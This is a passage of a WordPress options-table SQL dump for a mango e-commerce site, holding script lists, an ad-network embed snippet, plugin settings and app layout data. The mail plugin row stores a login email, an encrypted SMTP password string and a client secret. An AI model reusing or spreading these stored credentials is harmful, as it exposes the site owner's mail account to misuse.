assets/js/flexslider/jquery.flexslider.min.js\";s:21:\"photoswipe-ui-default\";s:102:\"https://mangomitra.in/wp-content/plugins/woocommerce/assets/js/photoswipe/photoswipe-ui-default.min.js\";s:17:\"wc-single-product\";s:93:\"https://mangomitra.in/wp-content/plugins/woocommerce/assets/js/frontend/single-product.min.js\";s:11:\"woocommerce\";s:90:\"https://mangomitra.in/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js\";s:17:\"wc-cart-fragments\";s:93:\"https://mangomitra.in/wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js\";s:22:\"jquery-ui-autocomplete\";s:66:\"https://mangomitra.in/wp-includes/js/jquery/ui/autocomplete.min.js\";s:12:\"imagesloaded\";s:56:\"https://mangomitra.in/wp-includes/js/imagesloaded.min.js\";s:21:\"open-shop-pro-menu-js\";s:71:\"https://mangomitra.in/wp-content/themes/open-shop//js/open-shop-menu.js\";s:27:\"open-shop-accordian-menu-js\";s:81:\"https://mangomitra.in/wp-content/themes/open-shop//js/open-shop-accordian-menu.js\";s:19:\"open-shop-custom-js\";s:73:\"https://mangomitra.in/wp-content/themes/open-shop//js/open-shop-custom.js\";s:13:\"comment-reply\";s:57:\"https://mangomitra.in/wp-includes/js/comment-reply.min.js\";s:24:\"open-shop-woocommerce-js\";s:84:\"https://mangomitra.in/wp-content/themes/open-shop//inc/woocommerce/js/woocommerce.js\";s:15:\"open-quick-view\";s:93:\"https://mangomitra.in/wp-content/themes/open-shop/inc/woocommerce/quick-view/js/quick-view.js\";s:15:\"owl.carousel-js\";s:91:\"https://mangomitra.in/wp-content/plugins/hunk-companion/gogolite/js/gogo-js/owl.carousel.js\";s:15:\"jssor.slider-js\";s:95:\"https://mangomitra.in/wp-content/plugins/hunk-companion/open-shop/assets/js/jssor.slider.min.js\";s:25:\"thunk-open-shop-custom-js\";s:85:\"https://mangomitra.in/wp-content/plugins/hunk-companion/open-shop/assets/js/custom.js\";s:22:\"thunk-open-shop-woo-js\";s:103:\"https://mangomitra.in/wp-content/plugins/hunk-companion/open-shop/open-shop-admin/woo/js/woocommerce.js\";s:17:\"jquery-blockui_js\";s:111:\"https://mangomitra.in/wp-content/plugins/wc-frontend-manager/includes/libs/jquery-blockui/jquery.blockUI.min.js\";s:27:\"wcfm_product_multivendor_js\";s:138:\"https://mangomitra.in/wp-content/plugins/wc-multivendor-marketplace/assets/js/min/product_multivendor/wcfmmp-script-product-multivendor.js\";s:31:\"th-advance-product-search-front\";s:92:\"https://mangomitra.in/wp-content/plugins/th-advance-product-search/assets/js/thaps-search.js\";s:20:\"jquery-ui-datepicker\";s:64:\"https://mangomitra.in/wp-includes/js/jquery/ui/datepicker.min.js\";s:12:\"wcfm_core_js\";s:94:\"https://mangomitra.in/wp-content/plugins/wc-frontend-manager/assets/js/min/wcfm-script-core.js\";s:18:\"vi-wcaio-menu-cart\";s:87:\"https://mangomitra.in/wp-content/plugins/woo-cart-all-in-one/assets/js/menu-cart.min.js\";s:11:\"appp-no-app\";s:64:\"https://mangomitra.in/wp-content/plugins/apppresser/js/no-app.js\";s:10:\"underscore\";s:54:\"https://mangomitra.in/wp-includes/js/underscore.min.js\";s:9:\"shortcode\";s:53:\"https://mangomitra.in/wp-includes/js/shortcode.min.js\";s:5:\"utils\";s:49:\"https://mangomitra.in/wp-includes/js/utils.min.js\";s:8:\"backbone\";s:52:\"https://mangomitra.in/wp-includes/js/backbone.min.js\";s:7:\"wp-util\";s:51:\"https://mangomitra.in/wp-includes/js/wp-util.min.js\";s:11:\"wp-backbone\";s:55:\"https://mangomitra.in/wp-includes/js/wp-backbone.min.js\";s:12:\"media-models\";s:56:\"https://mangomitra.in/wp-includes/js/media-models.min.js\";s:7:\"moxiejs\";s:58:\"https://mangomitra.in/wp-includes/js/plupload/moxie.min.js\";s:8:\"plupload\";s:61:\"https://mangomitra.in/wp-includes/js/plupload/plupload.min.js\";s:5:\"json2\";s:49:\"https://mangomitra.in/wp-includes/js/json2.min.js\";s:11:\"wp-plupload\";s:64:\"https://mangomitra.in/wp-includes/js/plupload/wp-plupload.min.js\";s:14:\"jquery-ui-core\";s:58:\"https://mangomitra.in/wp-includes/js/jquery/ui/core.min.js\";s:15:\"jquery-ui-mouse\";s:59:\"https://mangomitra.in/wp-includes/js/jquery/ui/mouse.min.js\";s:18:\"jquery-ui-sortable\";s:62:\"https://mangomitra.in/wp-includes/js/jquery/ui/sortable.min.js\";s:17:\"mediaelement-core\";s:80:\"https://mangomitra.in/wp-includes/js/mediaelement/mediaelement-and-player.min.js\";s:20:\"mediaelement-migrate\";s:77:\"https://mangomitra.in/wp-includes/js/mediaelement/mediaelement-migrate.min.js\";s:15:\"wp-mediaelement\";s:72:\"https://mangomitra.in/wp-includes/js/mediaelement/wp-mediaelement.min.js\";s:14:\"wp-api-request\";s:55:\"https://mangomitra.in/wp-includes/js/api-request.min.js\";s:19:\"regenerator-runtime\";s:75:\"https://mangomitra.in/wp-includes/js/dist/vendor/regenerator-runtime.min.js\";s:11:\"wp-polyfill\";s:67:\"https://mangomitra.in/wp-includes/js/dist/vendor/wp-polyfill.min.js\";s:12:\"wp-dom-ready\";s:58:\"https://mangomitra.in/wp-includes/js/dist/dom-ready.min.js\";s:8:\"wp-hooks\";s:54:\"https://mangomitra.in/wp-includes/js/dist/hooks.min.js\";s:7:\"wp-i18n\";s:53:\"https://mangomitra.in/wp-includes/js/dist/i18n.min.js\";s:7:\"wp-a11y\";s:53:\"https://mangomitra.in/wp-includes/js/dist/a11y.min.js\";s:9:\"clipboard\";s:53:\"https://mangomitra.in/wp-includes/js/clipboard.min.js\";s:11:\"media-views\";s:55:\"https://mangomitra.in/wp-includes/js/media-views.min.js\";s:10:\"photoswipe\";s:91:\"https://mangomitra.in/wp-content/plugins/woocommerce/assets/js/photoswipe/photoswipe.min.js\";s:14:\"jquery-blockui\";s:99:\"https://mangomitra.in/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js\";s:9:\"js-cookie\";s:89:\"https://mangomitra.in/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js\";s:14:\"jquery-ui-menu\";s:58:\"https://mangomitra.in/wp-includes/js/jquery/ui/menu.min.js\";s:24:\"wc-add-to-cart-variation\";s:100:\"https://mangomitra.in/wp-content/plugins/woocommerce/assets/js/frontend/add-to-cart-variation.min.js\";}}','yes'),(24681,'androapp_ads','a:3:{s:15:\"androapp_header\";s:0:\"\";s:6:\"top_ad\";s:0:\"\";s:9:\"bottom_ad\";s:922:\"<!-- AndroApp Start -->\r\n<div id=\"M182532ScriptRootC61716\">\r\n    <div id=\"M182532PreloadC61716\">\r\n        Loading...\r\n    </div>\r\n    <script>\r\n                (function(){\r\n            var D=new Date(),d=document,b=\'body\',ce=\'createElement\',ac=\'appendChild\',st=\'style\',ds=\'display\',n=\'none\',gi=\'getElementById\';\r\n            var i=d[ce](\'iframe\');i[st][ds]=n;d[gi](\"M182532ScriptRootC61716\")[ac](i);try{var iw=i.contentWindow.document;iw.open();iw.writeln(\"<ht\"+\"ml><bo\"+\"dy></bo\"+\"dy></ht\"+\"ml>\");iw.close();var c=iw[b];}\r\n            catch(e){var iw=d;var c=d[gi](\"M182532ScriptRootC61716\");}var dv=iw[ce](\'div\');dv.id=\"MG_ID\";dv[st][ds]=n;dv.innerHTML=61716;c[ac](dv);\r\n            var s=iw[ce](\'script\');s.async=\'async\';s.defer=\'defer\';s.charset=\'utf-8\';s.src=\"//jsc.mgid.com/a/n/androapp.mobi.61716.js?t=\"+D.getYear()+D.getMonth()+D.getDate()+D.getHours();c[ac](s);})();\r\n    </script>\r\n</div>\r\n<!-- AndroApp End -->\";}','yes'),(24743,'product-pre-orders-for-woo_dismiss_notices','1','yes'),(24746,'wcfm_wcfmu_inactive23112021_tracking_notice','hide','yes'),(24866,'menu_icons_install','1644469675','yes'),(25293,'wp_mail_smtp_initial_version','3.2.1','no'),(25294,'wp_mail_smtp_version','3.2.1','no'),(25295,'wp_mail_smtp','a:16:{s:4:\"mail\";a:6:{s:10:\"from_email\";s:18:\"namaste@gopalak.in\";s:9:\"from_name\";s:10:\"MangoMitra\";s:6:\"mailer\";s:4:\"smtp\";s:11:\"return_path\";b:0;s:16:\"from_email_force\";b:1;s:15:\"from_name_force\";b:1;}s:4:\"smtp\";a:7:{s:7:\"autotls\";b:1;s:4:\"auth\";b:1;s:4:\"host\";s:13:\"smtp.zoho.com\";s:4:\"port\";i:465;s:10:\"encryption\";s:3:\"ssl\";s:4:\"user\";s:18:\"namaste@gopalak.in\";s:4:\"pass\";s:72:\"+sloNsDhx6sFnfmt5X3hEH+mGLvXenZVr1Rel865T4BIWy2/A+og06JSBKXYw8CwUYVVB4Y=\";}s:7:\"general\";a:1:{s:29:\"summary_report_email_disabled\";b:0;}s:5:\"gmail\";a:5:{s:9:\"client_id\";s:11:\"Mango Mitra\";s:13:\"client_secret\";s:10:\"mangomitra\";s:12:\"access_token\";a:0:{}s:13:\"refresh_token\";s:0:\"\";s:20:\"is_setup_wizard_auth\";b:1;}s:7:\"smtpcom\";a:2:{s:7:\"api_key\";s:0:\"\";s:7:\"channel\";s:0:\"\";}s:10:\"sendinblue\";a:2:{s:7:\"api_key\";s:0:\"\";s:6:\"domain\";s:0:\"\";}s:7:\"mailgun\";a:3:{s:7:\"api_key\";s:0:\"\";s:6:\"domain\";s:0:\"\";s:6:\"region\";s:2:\"US\";}s:8:\"sendgrid\";a:2:{s:7:\"api_key\";s:0:\"\";s:6:\"domain\";s:0:\"\";}s:9:\"sparkpost\";a:2:{s:7:\"api_key\";s:0:\"\";s:6:\"region\";s:2:\"US\";}s:8:\"postmark\";a:2:{s:16:\"server_api_token\";s:0:\"\";s:14:\"message_stream\";s:0:\"\";}s:9:\"amazonses\";a:3:{s:9:\"client_id\";s:0:\"\";s:13:\"client_secret\";s:0:\"\";s:6:\"region\";s:9:\"us-east-1\";}s:7:\"outlook\";a:5:{s:9:\"client_id\";s:0:\"\";s:13:\"client_secret\";s:0:\"\";s:12:\"access_token\";a:0:{}s:13:\"refresh_token\";s:0:\"\";s:12:\"user_details\";a:1:{s:5:\"email\";s:0:\"\";}}s:4:\"zoho\";a:6:{s:9:\"client_id\";s:0:\"\";s:13:\"client_secret\";s:0:\"\";s:6:\"domain\";s:3:\"com\";s:12:\"access_token\";a:0:{}s:13:\"refresh_token\";s:0:\"\";s:12:\"user_details\";a:1:{s:5:\"email\";s:0:\"\";}}s:4:\"logs\";a:5:{s:7:\"enabled\";b:0;s:17:\"log_email_content\";b:0;s:16:\"save_attachments\";b:0;s:19:\"open_email_tracking\";b:0;s:19:\"click_link_tracking\";b:0;}s:9:\"sendlayer\";a:1:{s:7:\"api_key\";s:0:\"\";}s:11:\"alert_email\";a:2:{s:7:\"enabled\";b:0;s:11:\"connections\";a:0:{}}}','no'),(25296,'wp_mail_smtp_activated_time','1644489249','no'),(25297,'wp_mail_smtp_activated','a:1:{s:4:\"lite\";i:1644489249;}','yes'),(25300,'wp_mail_smtp_migration_version','5','yes'),(25301,'wp_mail_smtp_debug_events_db_version','1','yes'),(25302,'wp_mail_smtp_activation_prevent_redirect','1','yes'),(25309,'wp_mail_smtp_setup_wizard_stats','a:3:{s:13:\"launched_time\";i:1666950845;s:14:\"completed_time\";i:1666951168;s:14:\"was_successful\";b:0;}','no'),(25371,'nh_ynaa_css_settings','a:2:{s:3:\"css\";s:0:\"\";i:1644492933;i:1644492933;}','yes'),(25372,'nh_ynaa_css_settings_ts','1644492933','yes'),(25373,'nh_ynaa_plugin_version','0.8.8.8','yes'),(25374,'nh_ynaa_general_settings','a:22:{s:4:\"sort\";i:1;s:2:\"c1\";s:7:\"#808080\";s:2:\"cm\";s:7:\"#212121\";s:2:\"c2\";s:7:\"#ffffff\";s:2:\"cn\";s:7:\"#f2f2f2\";s:2:\"ct\";s:7:\"#212121\";s:2:\"ch\";s:7:\"#808080\";s:3:\"csh\";s:7:\"#000000\";s:2:\"ts\";i:1644492933;s:8:\"comments\";i:1;s:4:\"logo\";s:72:\"https://mangomitra.in/wp-content/plugins/yournewsapp/img/placeholder.png\";s:4:\"lang\";s:2:\"en\";s:14:\"homescreentype\";i:1;s:8:\"sorttype\";s:6:\"recent\";s:23:\"min-img-size-for-resize\";i:100;s:5:\"theme\";i:1;s:16:\"avada-categories\";i:0;s:22:\"showFeatureImageInPost\";i:1;s:12:\"relatedPosts\";i:1;s:13:\"relatedDesign\";i:3;s:12:\"relatedCount\";i:4;s:27:\"useFeatureImageOriginalSize\";i:0;}','yes'),(25375,'nh_ynaa_general_settings_ts','1644492933','yes'),(25376,'nh_ynaa_menu_settings','a:2:{s:4:\"menu\";a:2:{i:0;a:6:{s:5:\"title\";s:6:\"Browse\";s:6:\"status\";i:1;s:3:\"pos\";i:1;s:2:\"id\";i:0;s:4:\"type\";s:3:\"app\";s:9:\"type_text\";s:3:\"App\";}i:2;a:6:{s:5:\"title\";s:13:\"Notifications\";s:6:\"status\";i:1;s:3:\"pos\";i:3;s:2:\"id\";i:2;s:4:\"type\";s:10:\"pushCenter\";s:9:\"type_text\";s:10:\"Pushcenter\";}}s:2:\"ts\";i:1644492933;}','yes'),(25377,'nh_ynaa_menu_settings_ts','1644492933','yes'),(25378,'nh_ynaa_teaser_settings','a:5:{s:2:\"ts\";i:0;s:6:\"teaser\";a:3:{i:0;i:732;i:1;i:718;i:2;i:1;}s:5:\"limit\";i:3;s:6:\"source\";s:6:\"recent\";s:8:\"hidehome\";i:1;}','yes'),(25379,'nh_ynaa_teaser_settings_ts','1644492933','yes'),(25380,'nh_ynaa_homepreset_settings','a:5:{s:2:\"ts\";i:1644492933;s:5:\"items\";a:3:{i:0;a:6:{s:3:\"img\";s:0:\"\";s:5:\"title\";s:4:\"food\";s:11:\"allowRemove\";i:1;s:2:\"id\";i:19;s:4:\"type\";s:3:\"cat\";s:3:\"id2\";i:1;}i:1;a:6:{s:3:\"img\";s:0:\"\";s:5:\"title\";s:5:\"offer\";s:11:\"allowRemove\";i:1;s:2:\"id\";i:20;s:4:\"type\";s:3:\"cat\";s:3:\"id2\";i:2;}i:2;a:6:{s:3:\"img\";s:0:\"\";s:5:\"title\";s:13:\"Uncategorized\";s:11:\"allowRemove\";i:1;s:2:\"id\";i:1;s:4:\"type\";s:3:\"cat\";s:3:\"id2\";i:3;}}s:14:\"homescreentype\";i:1;s:8:\"sorttype\";s:9:\"date-desc\";s:8:\"posttype\";a:1:{s:4:\"post\";i:1;}}','yes'),(25381,'nh_ynaa_homepreset_settings_ts','1644492933','yes'),(25382,'nh_ynaa_push_settings','a:3:{s:8:\"pushshow\";i:1;s:6:\"appkey\";s:6:\"APPKEY\";s:10:\"pushsecret\";s:10:\"PUSHSECRET\";}','yes'),(25383,'nh_ynaa_push_settings_ts','1644492933','yes'),(25384,'nh_ynaa_categories_settings','a:4:{i:19;a:5:{s:3:\"img\";s:0:\"\";s:8:\"cat_name\";s:4:\"food\";s:9:\"cat_order\";s:9:\"date-desc\";s:7:\"hidecat\";i:0;s:9:\"usecatimg\";i:0;}i:20;a:5:{s:3:\"img\";s:0:\"\";s:8:\"cat_name\";s:5:\"offer\";s:9:\"cat_order\";s:9:\"date-desc\";s:7:\"hidecat\";i:0;s:9:\"usecatimg\";i:0;}i:1;a:5:{s:3:\"img\";s:0:\"\";s:8:\"cat_name\";s:13:\"Uncategorized\";s:9:\"cat_order\";s:9:\"date-desc\";s:7:\"hidecat\";i:0;s:9:\"usecatimg\";i:0;}s:2:\"ts\";i:1644492933;}','yes'),(25385,'nh_ynaa_categories_settings_ts','1644492933','yes'),(25386,'nh_ynaa_articles_ts','1644492933','yes'),(25387,'nh_ynaa_db_version','1.2','yes'),(25388,'widget_nh_blappsta_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(25389,'wp_mail_smtp_review_notice','a:2:{s:4:\"time\";i:1665738342;s:9:\"dismissed\";b:1;}','yes'),(25391,'nh_ynaa_blappsta','a:1:{s:3:\"app\";a:3:{s:7:\"changes\";i:0;s:2:\"ts\";i:0;s:5:\"error\";a:3:{s:11:\"error_level\";i:5;s:10:\"error_code\";i:118;s:13:\"error_message\";s:30:\"No App options for this app id\";}}}','yes'),(25392,'nh_ynaa_blappsta_ts','1644492998','yes'),(25394,'wp_mail_smtp_notifications','a:4:{s:6:\"update\";i:1747374281;s:4:\"feed\";a:0:{}s:6:\"events\";a:0:{}s:9:\"dismissed\";a:0:{}}','yes'),(25405,'woo-cart-all-in-one_dismiss_notices','1','yes'),(25547,'wapppress_settings','a:7:{s:14:\"wapppress_name\";s:10:\"MangoMitra\";s:22:\"wapppress_theme_switch\";s:2:\"on\";s:23:\"wapppress_theme_setting\";s:9:\"open-shop\";s:22:\"wapppress_home_setting\";s:3:\"403\";s:22:\"wapppress_theme_author\";s:0:\"\";s:20:\"wapppress_theme_date\";s:0:\"\";s:23:\"wapppress_theme_comment\";s:0:\"\";}','yes'),(26734,'appmaker_wc_inAppPages_home','O:8:\"stdClass\":7:{s:7:\"widgets\";a:6:{i:0;O:8:\"stdClass\":6:{s:4:\"type\";s:6:\"slider\";s:8:\"expanded\";b:1;s:9:\"data_main\";O:8:\"stdClass\":0:{}s:3:\"key\";s:15:\"widget_key_5322\";s:4:\"data\";a:4:{i:0;O:8:\"stdClass\":2:{s:5:\"image\";O:8:\"stdClass\":4:{s:5:\"label\";s:5:\"Imgae\";s:7:\"display\";b:1;s:13:\"display_value\";s:65:\"http://demo.shopilder.com/wp-content/uploads/2019/07/banner-1.png\";s:5:\"value\";O:8:\"stdClass\":3:{s:6:\"status\";s:7:\"success\";s:3:\"url\";s:65:\"http://demo.shopilder.com/wp-content/uploads/2019/07/banner-1.png\";s:4:\"meta\";O:8:\"stdClass\":2:{s:5:\"width\";i:1080;s:6:\"height\";i:575;}}}s:4:\"data\";O:8:\"stdClass\":4:{s:5:\"image\";O:8:\"stdClass\":4:{s:5:\"label\";s:5:\"Imgae\";s:7:\"display\";b:1;s:13:\"display_value\";s:65:\"http://demo.shopilder.com/wp-content/uploads/2019/07/banner-1.png\";s:5:\"value\";O:8:\"stdClass\":3:{s:6:\"status\";s:7:\"success\";s:3:\"url\";s:65:\"http://demo.shopilder.com/wp-content/uploads/2019/07/banner-1.png\";s:4:\"meta\";O:8:\"stdClass\":2:{s:5:\"width\";i:1080;s:6:\"height\";i:575;}}}s:5:\"title\";O:8:\"stdClass\":4:{s:13:\"display_value\";s:0:\"\";s:5:\"value\";s:0:\"\";s:5:\"label\";s:5:\"Title\";s:7:\"display\";b:1;}s:6:\"action\";O:8:\"stdClass\":4:{s:5:\"value\";s:16:\"OPEN_IN_APP_PAGE\";s:13:\"display_value\";s:16:\"Open In-App Page\";s:5:\"label\";s:6:\"Action\";s:7:\"display\";b:1;}s:12:\"action_value\";O:8:\"stdClass\":4:{s:5:\"value\";s:4:\"home\";s:13:\"display_value\";s:4:\"Home\";s:5:\"label\";s:18:\"Choose In-App Page\";s:7:\"display\";b:1;}}}i:1;O:8:\"stdClass\":2:{s:5:\"image\";O:8:\"stdClass\":4:{s:5:\"label\";s:5:\"Imgae\";s:7:\"display\";b:1;s:13:\"display_value\";s:65:\"http://demo.shopilder.com/wp-content/uploads/2019/07/banner-2.png\";s:5:\"value\";O:8:\"stdClass\":3:{s:6:\"status\";s:7:\"success\";s:3:\"url\";s:65:\"http://demo.shopilder.com/wp-content/uploads/2019/07/banner-2.png\";s:4:\"meta\";O:8:\"stdClass\":2:{s:5:\"width\";i:1080;s:6:\"height\";i:575;}}}s:4:\"data\";O:8:\"stdClass\":4:{s:5:\"image\";O:8:\"stdClass\":4:{s:5:\"label\";s:5:\"Imgae\";s:7:\"display\";b:1;s:13:\"display_value\";s:65:\"http://demo.shopilder.com/wp-content/uploads/2019/07/banner-2.png\";s:5:\"value\";O:8:\"stdClass\":3:{s:6:\"status\";s:7:\"success\";s:3:\"url\";s:65:\"http://demo.shopilder.com/wp-content/uploads/2019/07/banner-2.png\";s:4:\"meta\";O:8:\"stdClass\":2:{s:5:\"width\";i:1080;s:6:\"height\";i:575;}}}s:5:\"title\";O:8:\"stdClass\":4:{s:13:\"display_value\";s:0:\"\";s:5:\"value\";s:0:\"\";s:5:\"label\";s:5:\"Title\";s:7:\"display\";b:1;}s:6:\"action\";O:8:\"stdClass\":4:{s:5:\"value\";s:12:\"LIST_PRODUCT\";s:13:\"display_value\";s:16:\"Product Category\";s:5:\"label\";s:6:\"Action\";s:7:\"display\";b:1;}s:12:\"action_value\";O:8:\"stdClass\":4:{s:5:\"value\";s:0:\"\";s:13:\"display_value\";s:3:\"All\";s:5:\"label\";s:26:\"Choose Product by Category\";s:7:\"display\";b:1;}}}i:2;O:8:\"stdClass\":2:{s:5:\"image\";O:8:\"stdClass\":4:{s:5:\"label\";s:5:\"Imgae\";s:7:\"display\";b:1;s:13:\"display_value\";s:65:\"http://demo.shopilder.com/wp-content/uploads/2019/07/banner-3.png\";s:5:\"value\";O:8:\"stdClass\":3:{s:6:\"status\";s:7:\"success\";s:3:\"url\";s:65:\"http://demo.shopilder.com/wp-content/uploads/2019/07/banner-3.png\";s:4:\"meta\";O:8:\"stdClass\":2:{s:5:\"width\";i:1080;s:6:\"height\";i:575;}}}s:4:\"data\";O:8:\"stdClass\":4:{s:5:\"image\";O:8:\"stdClass\":4:{s:5:\"label\";s:5:\"Imgae\";s:7:\"display\";b:1;s:13:\"display_value\";s:65:\"http://demo.shopilder.com/wp-content/uploads/2019/07/banner-3.png\";s:5:\"value\";O:8:\"stdClass\":3:{s:6:\"status\";s:7:\"success\";s:3:\"url\";s:65:\"http://demo.shopilder.com/wp-content/uploads/2019/07/banner-3.png\";s:4:\"meta\";O:8:\"stdClass\":2:{s:5:\"width\";i:1080;s:6:\"height\";i:575;}}}s:5:\"title\";O:8:\"stdClass\":4:{s:13:\"display_value\";s:0:\"\";s:5:\"value\";s:0:\"\";s:5:\"label\";s:5:\"Title\";s:7:\"display\";b:1;}s:6:\"action\";O:8:\"stdClass\":4:{s:5:\"value\";s:12:\"LIST_PRODUCT\";s:13:\"display_value\";s:16:\"Product Category\";s:5:\"label\";s:6:\"Action\";s:7:\"display\";b:1;}s:12:\"action_value\";O:8:\"stdClass\":4:{s:5:\"value\";s:0:\"\";s:13:\"display_value\";s:3:\"All\";s:5:\"label\";s:26:\"Choose Product by Category\";s:7:\"display\";b:1;}}}i:3;O:8:\"stdClass\":2:{s:5:\"image\";O:8:\"stdClass\":4:{s:5:\"label\";s:5:\"Imgae\";s:7:\"display\";b:1;s:13:\"display_value\";s:65:\"http://demo.shopilder.com/wp-content/uploads/2019/07/banner-4.png\";s:5:\"value\";O:8:\"stdClass\":3:{s:6:\"status\";s:7:\"success\";s:3:\"url\";s:65:\"http://demo.shopilder.com/wp-content/uploads/2019/07/banner-4.png\";s:4:\"meta\";O:8:\"stdClass\":2:{s:5:\"width\";i:1080;s:6:\"height\";i:575;}}}s:4:\"data\";O:8:\"stdClass\":4:{s:5:\"image\";O:8:\"stdClass\":4:{s:5:\"label\";s:5:\"Imgae\";s:7:\"display\";b:1;s:13:\"display_value\";s:65:\"http://demo.shopilder.com/wp-content/uploads/2019/07/banner-4.png\";s:5:\"value\";O:8:\"stdClass\":3:{s:6:\"status\";s:7:\"success\";s:3:\"url\";s:65:\"http://demo.shopilder.com/wp-content/uploads/2019/07/banner-4.png\";s:4:\"meta\";O:8:\"stdClass\":2:{s:5:\"width\";i:1080;s:6:\"height\";i:575;}}}s:5:\"title\";O:8:\"stdClass\":4:{s:13:\"display_value\";s:0:\"\";s:5:\"value\";s:0:\"\";s:5:\"label\";s:5:\"Title\";s:7:\"display\";b:1;}s:6:\"action\";O:8:\"stdClass\":4:{s:5:\"value\";s:12:\"LIST_PRODUCT\";s:13:\"display_value\";s:16:\"Product Category\";s:5:\"label\";s:6:\"Action\";s:7:\"display\";b:1;}s:12:\"action_value\";O:8:\"stdClass\":4:{s:5:\"value\";s:0:\"\";s:13:\"display_value\";s:3:\"All\";s:5:\"label\";s:26:\"Choose Product by Category\";s:7:\"display\";b:1;}}}}s:5:\"title\";s:0:\"\";}i:1;O:8:\"stdClass\":6:{s:4:\"type\";s:4:\"grid\";s:8:\"expanded\";b:1;s:3:\"key\";s:16:\"widget_key_13002\";s:9:\"data_main\";O:8:\"stdClass\":5:{s:14:\"items_per_line\";O:8:\"stdClass\":4:{s:13:\"display_value\";s:1:\"2\";s:5:\"value\";s:1:\"2\";s:5:\"label\";s:14:\"Items per line\";s:7:\"display\";b:1;}s:21:\"show_view_more_button\";O:8:\"stdClass\":4:{s:5:\"value\";b:0;s:13:\"display_value\";s:4:\"Hide\";s:5:\"label\";s:21:\"show view more button\";s:7:\"display\";b:1;}s:22:\"view_more_button_title\";O:8:\"stdClass\":4:{s:5:\"value\";s:9:\"View more\";s:13:\"display_value\";s:9:\"View more\";s:5:\"label\";s:22:\"View more button title\";s:7:\"display\";b:1;}s:16:\"view_more_action\";s:9:\"NO_ACTION\";s:22:\"view_more_action_value\";s:0:\"\";}s:4:\"data\";a:4:{i:0;O:8:\"stdClass\":2:{s:5:\"image\";O:8:\"stdClass\":4:{s:5:\"label\";s:5:\"Imgae\";s:7:\"display\";b:1;s:13:\"display_value\";s:63:\"https://mangomitra.in/wp-content/uploads/2022/01/03-150x150.png\";s:5:\"value\";O:8:\"stdClass\":3:{s:6:\"status\";s:7:\"success\";s:3:\"url\";s:63:\"https://mangomitra.in/wp-content/uploads/2022/01/03-150x150.png\";s:4:\"meta\";O:8:\"stdClass\":2:{s:5:\"width\";i:300;s:6:\"height\";i:300;}}}s:4:\"data\";O:8:\"stdClass\":4:{s:5:\"image\";O:8:\"stdClass\":4:{s:5:\"label\";s:5:\"Imgae\";s:7:\"display\";b:1;s:13:\"display_value\";s:63:\"https://mangomitra.in/wp-content/uploads/2022/01/03-150x150.png\";s:5:\"value\";O:8:\"stdClass\":3:{s:6:\"status\";s:7:\"success\";s:3:\"url\";s:63:\"https://mangomitra.in/wp-content/uploads/2022/01/03-150x150.png\";s:4:\"meta\";O:8:\"stdClass\":2:{s:5:\"width\";i:300;s:6:\"height\";i:300;}}}s:5:\"title\";O:8:\"stdClass\":4:{s:13:\"display_value\";s:11:\"Dried Mango\";s:5:\"value\";s:11:\"Dried Mango\";s:5:\"label\";s:5:\"Title\";s:7:\"display\";b:1;}s:6:\"action\";O:8:\"stdClass\":4:{s:5:\"value\";s:12:\"LIST_PRODUCT\";s:13:\"display_value\";s:16:\"Product Category\";s:5:\"label\";s:6:\"Action\";s:7:\"display\";b:1;}s:12:\"action_value\";O:8:\"stdClass\":4:{s:5:\"value\";i:80;s:13:\"display_value\";s:11:\"Dried Mango\";s:5:\"label\";s:26:\"Choose Product by Category\";s:7:\"display\";b:1;}}}i:1;O:8:\"stdClass\":2:{s:5:\"image\";O:8:\"stdClass\":4:{s:5:\"label\";s:5:\"Imgae\";s:7:\"display\";b:1;s:13:\"display_value\";s:63:\"https://mangomitra.in/wp-content/uploads/2022/01/15-150x150.png\";s:5:\"value\";O:8:\"stdClass\":3:{s:6:\"status\";s:7:\"success\";s:3:\"url\";s:63:\"https://mangomitra.in/wp-content/uploads/2022/01/15-150x150.png\";s:4:\"meta\";O:8:\"stdClass\":2:{s:5:\"width\";i:300;s:6:\"height\";i:300;}}}s:4:\"data\";O:8:\"stdClass\":4:{s:5:\"image\";O:8:\"stdClass\":4:{s:5:\"label\";s:5:\"Imgae\";s:7:\"display\";b:1;s:13:\"display_value\";s:63:\"https://mangomitra.in/wp-content/uploads/2022/01/15-150x150.png\";s:5:\"value\";O:8:\"stdClass\":3:{s:6:\"status\";s:7:\"success\";s:3:\"url\";s:63:\"https://mangomitra.in/wp-content/uploads/2022/01/15-150x150.png\";s:4:\"meta\";O:8:\"stdClass\":2:{s:5:\"width\";i:300;s:6:\"height\";i:300;}}}s:5:\"title\";O:8:\"stdClass\":4:{s:13:\"display_value\";s:13:\"Fresh Mangoes\";s:5:\"value\";s:13:\"Fresh Mangoes\";s:5:\"label\";s:5:\"Title\";s:7:\"display\";b:1;}s:6:\"action\";O:8:\"stdClass\":4:{s:5:\"value\";s:12:\"LIST_PRODUCT\";s:13:\"display_value\";s:16:\"Product Category\";s:5:\"label\";s:6:\"Action\";s:7:\"display\";b:1;}s:12:\"action_value\";O:8:\"stdClass\":4:{s:5:\"value\";i:35;s:13:\"display_value\";s:13:\"Fresh Mangoes\";s:5:\"label\";s:26:\"Choose Product by Category\";s:7:\"display\";b:1;}}}i:2;O:8:\"stdClass\":2:{s:5:\"image\";O:8:\"stdClass\":4:{s:5:\"label\";s:5:\"Imgae\";s:7:\"display\";b:1;s:13:\"display_value\";s:63:\"https://mangomitra.in/wp-content/uploads/2022/01/16-150x150.png\";s:5:\"value\";O:8:\"stdClass\":3:{s:6:\"status\";s:7:\"success\";s:3:\"url\";s:63:\"https://mangomitra.in/wp-content/uploads/2022/01/16-150x150.png\";s:4:\"meta\";O:8:\"stdClass\":2:{s:5:\"width\";i:300;s:6:\"height\";i:300;}}}s:4:\"data\";O:8:\"stdClass\":4:{s:5:\"image\";O:8:\"stdClass\":4:{s:5:\"label\";s:5:\"Imgae\";s:7:\"display\";b:1;s:13:\"display_value\";s:63:\"https://mangomitra.in/wp-content/uploads/2022/01/16-150x150.png\";s:5:\"value\";O:8:\"stdClass\":3:{s:6:\"status\";s:7:\"success\";s:3:\"url\";s:63:\"https://mangomitra.in/wp-content/uploads/2022/01/16-150x150.png\";s:4:\"meta\";O:8:\"stdClass\":2:{s:5:\"width\";i:300;s:6:\"height\";i:300;}}}s:5:\"title\";O:8:\"stdClass\":4:{s:13:\"display_value\";s:17:\"Mango 